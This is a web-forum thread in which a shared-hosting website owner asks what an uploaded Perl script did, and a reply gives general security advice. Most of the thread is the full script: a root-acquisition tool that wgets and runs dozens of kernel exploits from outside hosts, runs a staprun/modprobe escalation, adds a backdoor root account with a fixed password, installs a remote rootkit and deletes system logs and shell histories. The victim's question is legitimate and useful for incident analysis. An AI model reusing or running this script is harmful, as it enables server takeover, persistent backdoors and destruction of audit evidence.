Hi,
Recently my has been hacked. A .pl script has been uploaded in the root of the directory, which uploaded lot of unwanted files and changed their file permission to 777.
I have no clue how did they upload that .pl file in my hosting.
Website is in shared hosting. Could they access my web root from other website which hosted in the same server?
Or any idea how could they reached my site root?
Lots of ideas, actually, but not knowing details doesn't help.
Ask your web hosting for assistance, but first start looking at your website, especially the places where there's user input.
I didn't get help from host. I will check the user uploading form.
Can you tell me what has he tried / done in my server from this coding?
#!/usr/bin/perl -w
if(@ARGV < 1){
print q (
#=============[ rOot Toolz ]=============#
| uid=0(root) gid=0(root) groups=0(root) |
| Get|rOot v1.0 |
| Use : perl ro0tget.pl -1 |
| THNK 2 : SarBoT511 SadHacKer SiLver.47 |
| i-Hmx The injector Z1d No-QrQr Fox HaC |
#=============[ Local root ]=============#
| Local root 2010 FreeBsD -7 |
| Local root aLL Exploit -8 |
| Local Root Privilege Escalation -9 |
#=============[ after root ]=============#
| More about GeT rOoT version 1.0 -ab |
| Help My i need help -he |
#========================================#
#============[ Local root ]==============#
| uid=0(root) gid=0(root) groups=0(root)|
| Local root 2010 x86_64 2.6.18-194 -1 |
| Local root 2009 i686 2.6.18-128 -2 |
| Local root 2008 2.6.18 -3 |
| Local root 2007 x86_64 2.6.22-6 -4 |
| all Local root -5 |
#============[ after root ]==============#
| Add root Account -r |
| add rootkit v4-team -t |
| rm -rf Log -rm |
#============[ about ]==============#
| GeT rOoT By Or4nG.M4n version 1.0 |
| priv8te [ @ ] Hotmail [ . ] com |
#========================================#
sec4ever.com | v4-team.com
);
exit;
}
if ($ARGV[0] =~ "-t" )
{
print "add Shell tools [ t ]\n";
system "wget http";
system "cd /usr/bin;chmod +s cat";
sleep(2);
print "\tcompleted .. \n\n";
}
if ($ARGV[0] =~ "-1" )
{
print "Local root 2010 x86_64 2.6.18-194 [ 1 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-1";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-1";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-1";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
if ($ARGV[0] =~ "-2" )
{
print "Local root 2009 i686 2.6.18-128 [ 2 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-2";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-2";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-2";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
if ($ARGV[0] =~ "-3" )
{
print "Local root 2008 i686 2.6.18 [ 3 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-3";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-3";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-3";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
if ($ARGV[0] =~ "-4" )
{
print "Local root 2007 x86_64 2.6.22-6 [ 4 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-4";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-4";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-4";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
if ($ARGV[0] =~ "-7" )
{
print "Local root 2010 FreeBsD [ bsd ]\n";
system "wget http://trav1an.t35.com/Localz/all/loc4l";
system "chmod 777 loc4l";
system "wget http://trav1an.t35.com/Localz/all/bsdlocal";
system "chmod 777 bsdlocal";
system "wget http://trav1an.t35.com/Localz/all/FreeBSDmaster.passwd.c";
system "chmod 777 FreeBSDmaster.passwd.c";
}
if ($ARGV[0] =~ "-8" )
{
print "Local root aLL Exploit [ pri ]\n";
system "wget http://trav1an.t35.com/Localz/all/2.4.20";
system "chmod 777 2.4.20";
system "wget http://trav1an.t35.com/Localz/all/2.4.29";
system "chmod 777 2.4.29";
system "wget http://trav1an.t35.com/Localz/all/2.4.34";
system "chmod 777 2.4.34";
system "wget http://trav1an.t35.com/Localz/all/2.6.8.c";
system "chmod 777 2.6.8.c";
system "wget http://trav1an.t35.com/Localz/all/2.6.6-34.c";
system "chmod 777 2.6.6-34.c";
print "\tcompleted .. \n\n";
print "\t ok now you can tray any Local";
}
if ($ARGV[0] =~ "-9" )
{
print "Local Root Privilege Escalation [ xpl ]\n";
system "pwd";
system 'printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever';
sleep(2);
print "\tcompleted .. \n\n";
system "uname -a;su;id";
}
if ($ARGV[0] =~ "-5" )
{
system("wget http://www.clearwatercottages.com/modules/2010-1");
system("chmod 777 2010-1");
system("./2010-1");
system("id;whoami");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.clearwatercottages.com/modules/2010-2");
system("chmod 777 2010-2");
system("./2010-2");
system("id;whoami");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.clearwatercottages.com/modules/linux-rds-exploit");
system("chmod 777 linux-rds-exploit");
system("./linux-rds-exploit");
system("id;whoami");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.clearwatercottages.com/modules/i-can-haz-modharden");
system("chmod 777 i-can-haz-modharden");
system("./i-can-haz-modharden");
system("id;whoami");
system("wget http://www.solarens.com/templates/beez/2.6.34-2011");
system("chmod 777 2.6.34-2011");
system("./2.6.34-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://www.schoolbd.com/adsense/cc/iskorpitx");
system("chmod 777 iskorpitx");
system("./iskorpitx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/c");
system("chmod 777 c");
system("./c");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/d");
system("chmod 777 d");
system("./d");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/44");
system("chmod 777 44");
system("./44");
system("id");
system("wget http://www.schoolbd.com/adsense/cc/9521");
system("chmod 777 9521");
system("./9521");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/run97");
system("chmod 777 run97");
system("./97");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/froot");
system("chmod 777 froot");
system("./froot");
system("id");
system("id");
system("id");
system("id");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-1.c");
system("gcc -Wall -o 18-1 18-1.c");
system("gcc -Wall -m64 -o 18-3 18-1.c");
system("chmod 777 18-1");
system("chmod 777 18-3");
system("./18-1");
system("id");
system("./18-3");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-2");
system("chmod 777 18-2");
system("./18-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-3");
system("chmod 777 18-3");
system("./18-3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-5");
system("chmod 777 18-5");
system("./18-5");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exploit2");
system("chmod 777 exploit2");
system("./exploit2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exp1");
system("chmod 777 exp1");
system("./exp1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exp2");
system("chmod 777 exp2");
system("./exp2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exp3");
system("chmod 777 exp3");
system("./exp3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2009-1");
system("chmod 777 2009-1");
system("./2009-1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/3.c");
system("gcc 3.c -o 3");
system("chmod 777 3");
system("./3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/3a");
system("chmod 777 3a");
system("./3a");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/4.c");
system("gcc 4.c -o 4");
system("chmod 777 4");
system("./4");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/4a");
system("chmod 777 4a");
system("./4a");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/cx.c");
system("gcc cx.c -o cx");
system("chmod 777 cx");
system("./cx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/cxx.c");
system("gcc cxx.c -o cxx");
system("chmod 777 cxx");
system("./cxx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exploit2");
system("chmod 777 exploit2");
system("./exploit2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/run");
system("chmod 777 run");
system("./run");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/rootsh.c");
system("gcc rootsh.c -o rootsh");
system("chmod 777 rootsh");
system("./rootsh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/29.c");
system("gcc 29.c -o 29");
system("chmod 777 29");
system("./29");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/30");
system("chmod 777 30");
system("./30");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2009");
system("chmod 777 2009");
system("./2009");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/pwnkernel");
system("chmod 777 pwnkernel");
system("./pwnkernel");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/05");
system("chmod 777 05");
system("./05");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/isko");
system("chmod 777 isko");
system("./isko");
system("id");
system("./isko");
system("isko");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18");
system("chmod 777 18");
system("./18");
system("id");
system("./18");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/7");
system("chmod 777 7");
system("./7");
system("id");
system("./7");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/7-2");
system("chmod 777 7-2");
system("./7-2");
system("id");
system("./7-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8");
system("chmod 777 8");
system("./8");
system("id");
system("./8");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8a");
system("chmod 777 8a");
system("./8a");
system("id");
system("./8a");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8bb");
system("chmod 777 8bb");
system("./8bb");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8cc");
system("chmod 777 8cc");
system("./8cc");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8x");
system("chmod 777 8x");
system("./8x");
system("id");
system("./8x");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2008");
system("chmod 777 2008");
system("./2008");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exploit");
system("chmod 777 exploit");
system("./exploit");
system("id"); ;
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2009xx");
system("chmod 777 2009xx");
system("./2009xx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8");
system("chmod 777 2.6.9-55-2007-prv8");
system("./2.6.9-55-2007-prv8");
system("id");
system("./2.6.9-55-2007-prv8");
system("id");
system("./2.6.9-55-2007-prv8");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
print "If u malesef rootlayamadin baska serverlerde mutlaka ama mutlaka:)by iskorpitx - Edit BY nO lOv3 \n";
}
if ($ARGV[0] =~ "-k" )
{
print "Local root 2009 i686 2.6.18-128 [ 2 ]\n";
system "wget http://grsecurity.net/~spender/64bit_dos.c";
sleep(2);
system("gcc 64bit_dos.c -o 64bit_dos");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 64bit_dos";
sleep(2);
print "\tcompleted .. \n\n";
system "./64bit_dos";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/exploit.txt";
sleep(2);
system("gcc exploit.txt -o exploitcc");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 exploitcc";
sleep(2);
print "\tcompleted .. \n\n";
system "./exploitcc";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/grlogalert.c";
sleep(2);
system("gcc grlogalert.c -o grlogalert");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 grlogalert";
sleep(2);
print "\tcompleted .. \n\n";
system "./grlogalert";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/vmlinuz_to_vmlinux_gz.c";
sleep(2);
system("gcc vmlinuz_to_vmlinux_gz.c -o vmlinuz_to_vmlinux_gz");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 vmlinuz_to_vmlinux_gz";
sleep(2);
print "\tcompleted .. \n\n";
system "./vmlinuz_to_vmlinux_gz";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/crashvmlinuz";
print "\tcompleted .. \n\n";
system "chmod 777 crashvmlinuz";
sleep(2);
print "\tcompleted .. \n\n";
system "./crashvmlinuz";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://dazzlestudio.net/2.6.18-164";
print "\tcompleted .. \n\n";
system "chmod 777 2.6.18-164";
sleep(2);
print "\tcompleted .. \n\n";
system "./2.6.18-164";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://alexoloughlinsplace.com/forum/NewDir/z1d-2011";
print "\tcompleted .. \n\n";
system "chmod 777 z1d-2011";
sleep(2);
print "\tcompleted .. \n\n";
system "./z1d-2011";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
if ($ARGV[0] =~ "-ab" )
{
print q (
sec4ever.com
);
}
if ($ARGV[0] =~ "-t" )
{
print "Add Root Account [ r ]\n";
print "user : [ roor ]\n";
system "adduser -g 0 roor -G wheel,sys,bin,daemon,adm,disk -d /sf7 -s /bin/sh";
system "passwd r0otH4x0r";
print "pass is : r0otH4x0r\n";
sleep(2);
}
if ($ARGV[0] =~ "-d" )
{
system("wget http://pjk.danawa.my/templates/beez/priv8-2.6.18.2010");
system("chmod 777 priv8-2.6.18.2010");
system("./priv8-2.6.18.2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/priv8-2.6.18-164-2010");
system("chmod 777 priv8-2.6.18-164-2010");
system("./priv8-2.6.18-164-2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2");
system("chmod 777 2");
system("./2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/1");
system("chmod 777 1");
system("./1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18-194");
system("chmod 777 2.6.18-194");
system("./2.6.18-194");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.32-21-generic-2010-i686");
system("chmod 777 2.6.32-21-generic-2010-i686");
system("./2.6.32-21-generic-2010-i686");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18-53");
system("chmod 777 2.6.18-53");
system("./2.6.18-53");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18-53");
system("chmod 777 2.6.30");
system("./2.6.18-53");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
}
if ($ARGV[0] =~ "-c" )
{
system "wget http://rbht.pp.ru/files/enlightenment.tgz";
sleep(2);
system "tar xzf enlightenment.tgz";
sleep(2);
system "cd enlightenment";
system "sed -i '/turn_\(on\|off\)_wp();/d' exploit.c";
sleep(2);
system "./run_null_exploits.sh";
sleep(2);
system "id";
system "id";
system "If u r r00t stop xpl with ctrl+c\n";
system "uname -a;su;id";
}
if ($ARGV[0] =~ "-rm" )
{
print "rm -rf Log [ rm ] \n";
system "rm -rf /tmp/logs";
system "rm -rf /root/.ksh_history";
system "rm -rf /root/.bash_history";
system "rm -rf /root/.bash_logout";
system "rm -rf /usr/local/apache/logs";
sleep(2);
system "rm -rf /usr/local/apache/log";
system "rm -rf /var/apache/logs";
system "rm -rf /var/apache/log";
system "rm -rf /var/run/utmp";
system "rm -rf /var/logs";
system "rm -rf /var/log";
sleep(2);
system "rm -rf /var/adm";
system "rm -rf /etc/wtmp";
system "rm -rf /etc/utmp";
system "cd /bin";
print "\tcompleted .. \n\n";
}
if ($ARGV[0] =~ "-v4" )
{
print "Add v4-team Rootkit [ v4 ]\n";
system "wget http://trav1an.t35.com/v4team-rootkit.tar.gz";
system "tar -xvvzf v4team-rootkit.tar.gz";
system "cd rootkit;./install";
print "user : wo7oshv4team , pass : v4teamhacker \n";
system "id";
print "\tcompleted .. \n\n";
}
if ($ARGV[0] =~ "-he" )
{
print q (
| Use : perl ro0tget.pl -1 |
);
}
Sorry, I'm not going to download all these web resources, just to check what they might possibly do. It's some sort of root access acquisition attempt or similar, but what's most important is that you should secure your site.
Hosting companies do not often offer support on private owners issues like security, but rather they are responsible only for the hosting environment, though some UAP might suggest proactive measures being undertaken in order to avoid bigger incident.
Back in my security officer days, I have personally disabled / renamed insecure customer scripts / pieces of code, as spammers, for example, are very keen to use them in a short periods of time, which usually causes this particular hosting server to get blacklisted at major providers.
So, bottom line - inspect your site, if you are sure (got a confirmation) that this is isolated issue, and not a hosting env. one.